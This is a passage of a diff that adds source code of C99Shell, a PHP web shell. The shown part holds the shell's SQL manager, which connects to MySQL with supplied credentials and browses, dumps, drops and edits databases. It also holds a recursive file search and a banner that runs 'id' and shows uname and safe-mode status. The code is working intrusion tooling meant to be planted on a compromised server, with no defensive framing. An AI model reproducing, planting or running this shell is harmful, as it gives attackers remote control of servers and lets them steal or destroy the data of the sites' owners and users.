mysql_query("SELECT * FROM `$tab`", $sock); + if (mysql_num_rows($res) > 0) + { + while ($row = mysql_fetch_assoc($res)) + { + $keys = implode("`, `", array_keys($row)); + $values = array_values($row); + foreach($values as $k=>$v) {$values[$k] = addslashes($v);} + $values = implode("', '", $values); + $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; + $out .= $sql; + } + } + } + } + } + $out .= "#---------------------------------------------------------------------------------\n\n"; + if ($file) + { + $fp = fopen($file, "w"); + if (!$fp) {$ret["err"][] = 2;} + else + { + fwrite ($fp, $out); + fclose ($fp); + } + } + if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}} + return $out; +} +} +if (!function_exists("mysql_buildwhere")) +{ +function mysql_buildwhere($array,$sep=" and",$functs=array()) +{ + if (!is_array($array)) {$array = array();} + $result = ""; + foreach($array as $k=>$v) + { + $value = ""; + if (!empty($functs[$k])) {$value .= $functs[$k]."(";} + $value .= "'".addslashes($v)."'"; + if (!empty($functs[$k])) {$value .= ")";} + $result .= "`".$k."` = ".$value.$sep; + } + $result = substr($result,0,strlen($result)-strlen($sep)); + return $result; +} +} +if (!function_exists("mysql_fetch_all")) +{ +function mysql_fetch_all($query,$sock) +{ + if ($sock) {$result = mysql_query($query,$sock);} + else {$result = mysql_query($query);} + $array = array(); + while ($row = mysql_fetch_array($result)) {$array[] = $row;} + mysql_free_result($result); + return $array; +} +} +if (!function_exists("mysql_smarterror")) +{ +function mysql_smarterror($type,$sock) +{ + if ($sock) {$error = mysql_error($sock);} + else {$error = mysql_error();} + $error = htmlspecialchars($error); + return $error; +} +} +if (!function_exists("mysql_query_form")) +{ +function mysql_query_form() +{ + global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct; + if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";} + if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} + if ((!$submit) or ($sql_act)) + { + echo "<table border=0><tr><td><form name=\"c99sh_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\">&nbsp;<input type=submit value=\"No\"></form></td>"; + if ($tbl_struct) + { + echo "<td valign=\"top\"><b>Fields:</b><br>"; + foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "آ» <a href=\"#\" onclick=\"document.c99sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";} + echo "</td></tr></table>"; + } + } + if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;} +} +} +if (!function_exists("mysql_create_db")) +{ +function mysql_create_db($db,$sock="") +{ + $sql = "CREATE DATABASE `".addslashes($db)."`;"; + if ($sock) {return mysql_query($sql,$sock);} + else {return mysql_query($sql);} +} +} +if (!function_exists("mysql_query_parse")) +{ +function mysql_query_parse($query) +{ + $query = trim($query); + $arr = explode (" ",$query); + /*array array() + { + "METHOD"=>array(output_type), + "METHOD1"... + ... + } + if output_type == 0, no output, + if output_type == 1, no output if no error + if output_type == 2, output without control-buttons + if output_type == 3, output with control-buttons + */ + $types = array( + "SELECT"=>array(3,1), + "SHOW"=>array(2,1), + "DELETE"=>array(1), + "DROP"=>array(1) + ); + $result = array(); + $op = strtoupper($arr[0]); + if (is_array($types[$op])) + { + $result["propertions"] = $types[$op]; + $result["query"] = $query; + if ($types[$op] == 2) + { + foreach($arr as $k=>$v) + { + if (strtoupper($v) == "LIMIT") + { + $result["limit"] = $arr[$k+1]; + $result["limit"] = explode(",",$result["limit"]); + if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);} + unset($arr[$k],$arr[$k+1]); + } + } + } + } + else {return false;} +} +} +if (!function_exists("c99fsearch")) +{ +function c99fsearch($d) +{ + global $found; + global $found_d; + global $found_f; + global $search_i_f; + global $search_i_d; + global $a; + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + $h = opendir($d); + while (($f = readdir($h)) !== false) + { + if($f != "." && $f != "..") + { + $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== false) || ($a["name_regexp"] and ereg($a["name"],$f)); + if (is_dir($d.$f)) + { + $search_i_d++; + if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;} + if (!is_link($d.$f)) {c99fsearch($d.$f);} + } + else + { + $search_i_f++; + if ($bool) + { + if (!empty($a["text"])) + { + $r = @file_get_contents($d.$f); + if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";} + if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);} + if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);} + else {$bool = strpos(" ".$r,$a["text"],1);} + if ($a["text_not"]) {$bool = !$bool;} + if ($bool) {$found[] = $d.$f; $found_f++;} + } + else {$found[] = $d.$f; $found_f++;} + } + } + } + } + closedir($h); +} +} +if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}} +//Sending headers +@ob_start(); +@ob_implicit_flush(0); +function onphpshutdown() +{ + global $gzipencode,$ft; + if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad"))) + { + $v = @ob_get_contents(); + @ob_end_clean(); + @ob_start("ob_gzHandler"); + echo $v; + @ob_end_flush(); + } +} +function c99shexit() +{ + onphpshutdown(); + exit; +} +header("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); +header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT"); +header("Cache-Control: no-store, no-cache, must-revalidate"); +header("Cache-Control: post-check=0, pre-check=0", false); +header("Pragma: no-cache"); +if (empty($tmpdir)) +{ + $tmpdir = ini_get("upload_tmp_dir"); + if (is_dir($tmpdir)) {$tmpdir = "/tmp/";} +} +$tmpdir = realpath($tmpdir); +$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir); +if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;} +if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;} +else {$tmpdir_logs = realpath($tmpdir_logs);} +if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") +{ + $safemode = true; + $hsafemode = "<font color=red>ON (secure)</font>"; +} +else {$safemode = false; $hsafemode = "<font color=green>OFF (not secure)</font>";} +$v = @ini_get("open_basedir"); +if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "<font color=red>".$v."</font>";} +else {$openbasedir = false; $hopenbasedir = "<font color=green>OFF (not secure)</font>";} +$sort = htmlspecialchars($sort); +if (empty($sort)) {$sort = $sort_default;} +$sort[1] = strtolower($sort[1]); +$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE"); +if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();} +$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE)); +@ini_set("highlight.bg",$highlight_bg); //FFFFFF +@ini_set("highlight.comment",$highlight_comment); //#FF8000 +@ini_set("highlight.default",$highlight_default); //#0000BB +@ini_set("highlight.html",$highlight_html); //#000000 +@ini_set("highlight.keyword",$highlight_keyword); //#007700 +@ini_set("highlight.string",$highlight_string); //#DD0000 +if (!is_array($actbox)) {$actbox = array();} +$dspact = $act = htmlspecialchars($act); +$disp_fullpath = $ls_arr = $notls = null; +$ud = urlencode($d); +?><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title><?php echo getenv("HTTP_HOST"); ?> - c99shell</title><STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><font face=Webdings size=6><b>!</b></font><a href="<?php echo $surl; ?>"><font face="Verdana" size="5"><b>C99Shell v. <?php echo $shver; ?></b></font></a><font face=Webdings size=6><b>!</b></font></p></center></th></tr><tr><td><p align="left"><b>Software:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;</p><p align="left"><b>uname -a:&nbsp;<?php echo wordwrap(php_uname(),90,"<br>",1); ?></b>&nbsp;</p><p align="left"><b><?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();} ?></b>&nbsp;</p><p align="left"><b>Safe-mode:&nbsp;<?php echo $hsafemode; ?></b></p><p align="left"><?php +$d = str_replace("\\",DIRECTORY_SEPARATOR,$d); +if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);} +$d = str_replace("\\",DIRECTORY_SEPARATOR,$d); +if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} +$d = str_replace("\\\\","\\",$d); +$dispd = htmlspecialchars($d); +$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1)); +$i = 0; +foreach($pd as $b) +{ + $t = ""; + $j = 0; + foreach ($e as $r) + { + $t.= $r.DIRECTORY_SEPARATOR; + if ($j == $i) {break;} + $j++; + } + echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>"; + $i++; +} +echo "&nbsp;&nbsp;&nbsp;"; +if (is_writable($d)) +{ + $wd = true; + $wdt = "<font color=green>[ ok ]</font>"; + echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>"; +} +else +{ + $wd = false; + $wdt = "<font color=red>[ Read-Only ]</font>"; + echo "<b>".view_perms_color($d)."</b>"; +} +if (is_callable("disk_free_space")) +{ + $free = disk_free_space($d); + $total = disk_total_space($d); + if ($free === false) {$free = 0;} + if ($total === false) {$total = 0;} + if ($free < 0) {$free = 0;} + if ($total < 0) {$total = 0;} + $used = $total-$free; + $free_percent = round(100/($total/$free),2); + echo "<br><b>Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)</b>"; +} +echo "<br>"; +$letters = ""; +if ($win) +{ + $v = explode("\\",$d); + $v = $v[0]; + foreach (range("a","z") as $letter) + { + $bool = $isdiskette = in_array($letter,$safemode_diskettes); + if (!$bool) {$bool = is_dir($letter.":\\");} + if ($bool) + { + $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"").">[ "; + if ($letter.":" != $v) {$letters .= $letter;} + else {$letters .= "<font color=green>".$letter."</font>";} + $letters .= " ]</a> "; + } + } + if (!empty($letters)) {echo "<b>Detected drives</b>: ".$letters."<br>";} +} +if (count($quicklaunch) > 0) +{ + foreach($quicklaunch as $item) + { + $item[1] = str_replace("%d",urlencode($d),$item[1]); + $item[1] = str_replace("%sort",$sort,$item[1]); + $v = realpath($d.".."); + if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);} + $item[1] = str_replace("%upd",urlencode($v),$item[1]); + echo "<a href=\"".$item[1]."\">".$item[0]."</a>&nbsp;&nbsp;&nbsp;&nbsp;"; + } +} +echo "</p></td></tr></table><br>"; +if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";} +echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">"; +if ($act == "") {$act = $dspact = "ls";} +if ($act == "sql") +{ + $sql_surl = $surl."act=sql"; + if ($sql_login) {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);} + if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);} + if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);} + if ($sql_port) {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);} + if ($sql_db) {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);} + $sql_surl .= "&"; + ?><h3>Attention! SQL-Manager is <u>NOT</u> ready module! Don't reports bugs.</h3><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php + if ($sql_server) + { + $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd); + $err = mysql_smarterror(); + @mysql_select_db($sql_db,$sql_sock); + if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();} + } + else {$sql_sock = false;} + echo "<b>SQL Manager:</b><br>"; + if (!$sql_sock) + { + if (!$sql_server) {echo "NO CONNECTION";} + else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";} + } + else + { + $sqlquicklaunch = array(); + $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"); + $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)); + $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus"); + $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars"); + $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes"); + $sqlquicklaunch[] = array("Logout",$surl."act=sql"); + echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>"; + if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><b>".$item[0]."</b></a> ] ";}} + echo "</center>"; + } + echo "</td></tr><tr>"; + if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"> i </font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b>&nbsp;</td><td><b>Database</b>&nbsp;</td></tr><form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td><input type="password" name="sql_passwd" value="" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"></td><td><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php } + else + { + //Start left panel + if (!empty($sql_db)) + { + ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php + $result = mysql_list_tables($sql_db); + if (!$result) {echo mysql_smarterror();} + else + { + echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>"; + $c = 0; + while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>آ»&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;} + if (!$c) {echo "No tables found in database.";} + } + } + else + { + ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php + $result = mysql_list_dbs($sql_sock); + if (!$result) {echo mysql_smarterror();} + else + { + ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php + $c = 0; + $dbs = ""; + while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;} + echo "<option value=\"\">Databases (".$c.")</option>"; + echo $dbs; + } + ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php + } + //End left panel + echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">"; + //Start center panel + $diplay = true; + if ($sql_db) + { + if (!is_numeric($c)) {$c = 0;} + if ($c == 0) {$c = "no";} + echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>"; + if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}} + echo "</b></center>"; + $acts = array("","dump"); + if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";} + elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";} + elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";} + elseif ($sql_tbl_act == "insert") + { + if ($sql_tbl_insert_radio == 1) + { + $keys = ""; + $akeys = array_keys($sql_tbl_insert); + foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";} + if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);} + $values = ""; + $i = 0; + foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;} + if (!empty($values)) {$values = substr($values,0,strlen($values)-2);} + $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );"; + $sql_act = "query"; + $sql_tbl_act = "browse"; + } + elseif ($sql_tbl_insert_radio == 2) + { + $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs); + $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;"; + $result = mysql_query($sql_query) or print(mysql_smarterror()); + $result = mysql_fetch_array($result, MYSQL_ASSOC); + $sql_act = "query"; + $sql_tbl_act = "browse"; + } + } + if ($sql_act == "query") + { + echo "<hr size=\"1\" noshade>"; + if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";} + if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} + if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form></td></tr></table>";} + } + if (in_array($sql_act,$acts)) + { + ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>Dump DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php + if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";} + if ($sql_act == "newtbl") + { + echo "<b>"; + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>"; + } + else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();} + } + elseif ($sql_act == "dump") + { + if (empty($submit)) + { + $diplay = false; + echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>"; + echo "<b>DB:</b>&nbsp;<input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>"; + $v = join (";",$dmptbls); + echo "<b>Only tables (explode \";\")&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>"; + if ($dump_file) {$tmp = $dump_file;} + else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");} + echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>"; + echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>"; + echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>"; + echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty"; + echo "</form>"; + } + else + { + $diplay = true; + $set = array(); + $set["sock"] = $sql_sock; + $set["db"] = $sql_db; + $dump_out = "download"; + $set["print"] = 0; + $set["nl2br"] = 0; + $set[""] = 